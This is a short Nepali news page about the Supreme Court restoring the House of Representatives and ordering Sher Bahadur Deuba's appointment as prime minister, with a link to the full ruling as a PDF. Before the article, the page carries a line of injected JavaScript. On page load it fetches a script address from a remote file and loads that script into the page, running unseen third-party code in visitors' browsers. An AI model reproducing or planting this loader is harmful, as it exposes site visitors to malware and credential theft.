;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
२८ असार काठमाडौँ, सर्वोच्च अदालतले प्रतिनिधिसभा विघटनविरुद्ध परेको रिटमा फैसला गरेको छ। अदालतले दोस्रो पटक संसद् पुनर्स्थापना गर्दै काँग्रेस सभापति शेरबहादुर देउवालाई २ दिनभित्र प्रधानमन्त्री बनाउन राष्ट्रपति कार्यालयको नाममा परमादेश जारी गरेको छ । साथै संविधानको धारा ७६ को उपधारा ५ बमोजिमको सरकार गठन गर्दा सांसदहरूमाथि दलको ह्वीप नलाग्ने सोमबार बसेको संवैधानिक इजलासले फैसला सुनाएको हो।
पूर्ण पाठ को लागि तालको लिंकमा जानुहोला PDF फाइल खुल्नेछ |
https://drive.google.com/file/d/1i8uNdh-DXLfDMyVUls2NQ4Iaq62xw_U2/view
फेसबुक प्रतिक्रियाहरु